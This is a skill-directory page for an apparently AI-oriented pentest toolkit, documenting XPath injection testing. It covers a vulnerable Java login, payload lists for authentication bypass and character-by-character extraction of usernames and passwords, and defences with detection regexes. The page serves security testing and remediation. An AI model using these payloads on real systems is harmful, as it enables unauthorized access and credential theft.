xpath-injection-testing

Skill from ed1s0nz/cyberstrikeai
What it does

Systematically tests and exploits XPath injection vulnerabilities by crafting malicious queries to bypass authentication and extract sensitive information.

Part of ed1s0nz/cyberstrikeai (11 items)

Installation

Clone the repository:
git clone https://github.com/Ed1s0nZ/CyberStrikeAI.git

Run with Go:
go run cmd/server/main.go

Build with Go:
go build -o cyberstrike-ai-mcp cmd/mcp-stdio/main.go

Claude Desktop configuration: add the server entry to your claude_desktop_config.json (the page shows it only truncated):
{ "mcpServers": { "cyberstrike-ai": { "command": "/absolute...

Extracted from docs: ed1s0nz/cyberstrikeai. Added Feb 4, 2026.

Skill Details

SKILL.md

Professional skill and methodology for XPath injection vulnerability testing

Overview

# XPath Injection Vulnerability Testing

Overview

XPath injection is a vulnerability similar to SQL injection: flaws in how an XPath query string is built can lead to information disclosure, authentication bypass and more. This skill covers methods for detecting, exploiting and defending against XPath injection.

How the vulnerability works

The application concatenates user input directly into an XPath query without adequate validation or filtering, which lets an attacker alter the logic of the query.

Example of dangerous code:

```java
import javax.xml.xpath.*;
import org.w3c.dom.NodeList;

// Vulnerable: the username and password are concatenated straight into the query text
String query = "//user[username='" + username + "' and password='" + password + "']";

XPath xpath = XPathFactory.newInstance().newXPath();
XPathExpression expr = xpath.compile(query);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
```

XPath Basics

Query syntax

Basic queries:

```

//user[username='admin']

//user[@id='1']

//user[username='admin' and password='pass']

//user[username='admin' or username='user']

```

Functions

Commonly used functions:

  • text() - returns the text content of a node
  • count() - counts nodes
  • substring() - extracts a substring
  • string-length() - returns the length of a string
  • contains() - checks whether a string contains another

Testing Methodology

1. Identify XPath input points

Common functionality:

  • User login
  • Data search
  • XML data queries
  • Configuration lookups

2. Basic detection

Test special characters:

```

' or '1'='1

' or '1'='1' or '

' or 1=1 or '

') or ('1'='1

```

Test logical operators:

```

' or '1'='1

' and '1'='2

' or 1=1 or '

```

3. Authentication bypass

Basic bypass:

```

Username: admin' or '1'='1

Password: anything

Query: //user[username='admin' or '1'='1' and password='anything']

```

More precise bypass:

```

Username: admin') or ('1'='1

Query: //user[username='admin') or ('1'='1' and password='*']

```

4. Information disclosure

Enumerate users:

```

' or 1=1 or '

' or '1'='1

') or 1=1 or ('

```

Get the node count:

```

' or count(//user)>0 or '

```

Get a specific node:

```

' or substring(//user[1]/username,1,1)='a' or '

```

Exploitation Techniques

Authentication bypass

Method 1: logic bypass

```

Input: admin' or '1'='1

Query: //user[username='admin' or '1'='1' and password='*']

Result: matches all users (and binds tighter than or, so the predicate is true for every user node)

```

Method 2: comment bypass

```

Input: admin')] | // | //[('

Query: //user[username='admin')] | // | //[('' and password='*']

```

Method 3: boolean-based blind injection

```

' or substring(//user[1]/username,1,1)='a' or '

' or substring(//user[1]/username,1,1)='b' or '

```

Information disclosure

Enumerate all users:

```

' or 1=1 or '

Result: returns all user nodes

```

Extract usernames:

```

' or substring(//user[1]/username,1,1)='a' or '

' or substring(//user[1]/username,2,1)='d' or '

Retrieve the value one character at a time

```

Extract passwords:

```

' or substring(//user[1]/password,1,1)='p' or '

Retrieve the password one character at a time

```

Blind injection techniques

Time-based blind injection (sleep() is not a standard XPath 1.0 function; this only works where the engine exposes such an extension):

```

' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '

```

Boolean-based blind injection:

```

' or substring(//user[1]/username,1,1)='a' or '

Observe differences in the response

```

Bypass Techniques

Encoding bypass

URL encoding:

```

' or '1'='1 → %27%20or%20%271%27%3D%271

```

HTML entity encoding:

```

' → &apos;

" → &quot;

< → &lt;

> → &gt;

```

Comment bypass

Using comments (XPath 1.0 has no comment syntax; these payloads instead close the string literal and reopen it so the rest of the query remains valid):

```

' or 1=1 or '

' or '1'='1' or '

```

Function bypass

Using alternative functions and axes to express the same lookup:

```

substring(//user[1]/username,1,1)

substring(//user[position()=1]/username,1,1)

//user[1]/username/text()[1]

```
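As an added example (not part of the skill file or the CyberStrikeAI project), the following Python flags the probe payloads from the detection and encoding sections above when they appear in request parameters, decoding URL encoding (including double encoding) and HTML entities first so the encoded variants are caught. The log format and sample lines are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# Signatures for the probe payloads described above: tautologies, contradictions,
# parenthesis breaking, node functions and location paths embedded in a value.
XPATH_PROBE_RULES = {
    "tautology":     re.compile(r"['\"]\)?\s*or\s*\(?['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "contradiction": re.compile(r"['\"]\)?\s*and\s*\(?['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "paren_break":   re.compile(r"\)\s*(?:or|and)\s*\(", re.I),
    "node_function": re.compile(r"\b(?:substring|count|string-length|contains|position)\s*\(", re.I),
    "path_in_value": re.compile(r"//\w+|\]\s*\|"),
}

# Constructed sample log lines (not real traffic): method, path and request parameters.
SAMPLE_LOG = [
    "POST /login user=alice pass=S3cret",
    "POST /login user=admin%27%20or%20%271%27%3D%271 pass=anything",
    "GET /search q=%27%20or%20substring(//user[1]/username,1,1)=%27a%27%20or%20%27",
    "GET /search q=%2527%2520or%25201%253D1%2520or%2520%2527",
]


def normalise(value: str, rounds: int = 3) -> str:
    """Undo (possibly repeated) URL encoding and HTML entities before matching."""
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list:
    """Return the names of every probe rule that matches one parameter value."""
    text = normalise(value)
    return [name for name, rx in XPATH_PROBE_RULES.items() if rx.search(text)]


def scan_log(lines: list) -> list:
    """Return (line number, parameter name, matched rules) for suspicious parameters."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for match in re.finditer(r"(\w+)=([^&\s]*)", line):
            rules = classify(match.group(2))
            if rules:
                findings.append((number, match.group(1), rules))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports lines 2 to 4; the benign login on line 1 produces no finding.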

Tool Usage

XPath expression testing

Online tools:

  • XPath Tester
  • XMLSpy
  • Oxygen XML Editor

Burp Suite

  1. Intercept the request that carries the XPath query
  2. Modify the query parameters
  3. Observe the response

Python script

```python
from lxml import etree

# Load the XML document (users.xml is the target's data file)
doc = etree.parse('users.xml')

# Test the injection: the tautology makes the predicate true for every user node
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = etree.XPath(xpath_expr)
results = xpath(doc)

# Print the matched user nodes; more than one match shows the predicate was subverted
for user in results:
    print(etree.tostring(user, encoding='unicode'))
```

Verification and Reporting

Verification steps

  1. Confirm that the XPath query can be controlled
  2. Verify authentication bypass or information disclosure
  3. Assess the impact (unauthorized access, data exposure, etc.)
  4. Record a complete PoC

Reporting essentials

  • Vulnerable location and input parameter
  • How the XPath query is constructed
  • Complete exploitation steps and PoC
  • Remediation advice (input validation, parameterized queries, etc.)

Defensive Measures

Recommended approaches

  1. Input validation

```java
import java.util.Arrays;

// XPath 1.0 has no escape character, so prefixing a metacharacter with a backslash
// does not neutralise it (a quote still terminates the literal). Validation therefore
// rejects any input containing a metacharacter instead of trying to escape it.
// "/" and "|" are included because the union-based bypass above relies on them.
private static final String[] XPATH_META_CHARS =
        {"'", "\"", "[", "]", "(", ")", "=", ">", "<", " ", "/", "|"};

public static String validateXPathInput(String input) {
    if (input == null) {
        throw new IllegalArgumentException("Input must not be null");
    }
    for (int i = 0; i < input.length(); i++) {
        String c = String.valueOf(input.charAt(i));
        if (Arrays.asList(XPATH_META_CHARS).contains(c)) {
            throw new IllegalArgumentException("Input contains XPath metacharacter: " + c);
        }
    }
    return input;
}
```

  2. Parameterized queries

```java
import java.util.Map;
import javax.xml.xpath.*;

// Use XPath variables: the values are bound at evaluation time and never parsed as query syntax,
// so no escaping of the raw username and password is needed
Map<String, Object> vars = Map.of("username", username, "password", password);
XPath xpath = XPathFactory.newInstance().newXPath();
// The resolver is installed on the XPath object before compile(); XPathExpression has no setter for it
xpath.setXPathVariableResolver(name -> vars.get(name.getLocalPart()));
XPathExpression expr = xpath.compile("//user[username=$username and password=$password]");
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
```

  3. Allow-list validation

```java
// Allow only a restricted character set (letters, digits and @._-); anything else is rejected
if (input == null || !input.matches("^[a-zA-Z0-9@._-]+$")) {
    throw new IllegalArgumentException("Invalid input");
}
```

  4. Precompiled queries

```java
// Predefined query template; $username and $password are XPath variables
// (an XPath variable name is a QName, so $1 and $2 would not be valid)
private static final String LOGIN_QUERY =
        "//user[username=$username and password=$password]";

// Bind the parameters through an XPathVariableResolver before compiling the template
```

  5. Least privilege

- Restrict the scope of XPath queries

- Apply access control

- Limit which nodes can be queried

Notes

  • Test only in authorized environments
  • Be aware of syntax differences between XPath versions
  • Avoid affecting the XML data while testing
  • Understand the target application's XPath implementation
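As an added example (not from the skill file or the CyberStrikeAI project), the following Python shows the fallback for engines or APIs that offer no variable binding: the untrusted value is rendered as an XPath 1.0 string literal, and because XPath 1.0 has no escape character a value containing both quote kinds is split and reassembled with concat(). The tautology payload from the bypass section then ends up as plain text inside the literal. The function names are this example's own.

```python
def xpath_literal(value: str) -> str:
    """Render an untrusted string as an XPath 1.0 string literal.

    A literal is delimited by the quote character it does not contain.
    When the value contains both kinds, it is split on single quotes and
    rejoined with concat(), where each single quote is passed as "'".
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = []
    for chunk in value.split("'"):      # chunks contain no single quote
        if chunk:
            parts.append("'" + chunk + "'")
        parts.append("\"'\"")            # the single quote itself, double-quoted
    parts.pop()                          # drop the separator after the last chunk
    return "concat(" + ", ".join(parts) + ")"


def build_login_query(username: str, password: str) -> str:
    """Build the login query discussed above with both values quoted as literals."""
    return "//user[username=%s and password=%s]" % (
        xpath_literal(username), xpath_literal(password))


if __name__ == "__main__":
    # The payload from the bypass section stays inside one literal and matches no user
    print(build_login_query("admin' or '1'='1", "anything"))
    # A value with both quote kinds is expressed through concat()
    print(build_login_query("a'b\"c", "x"))
```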
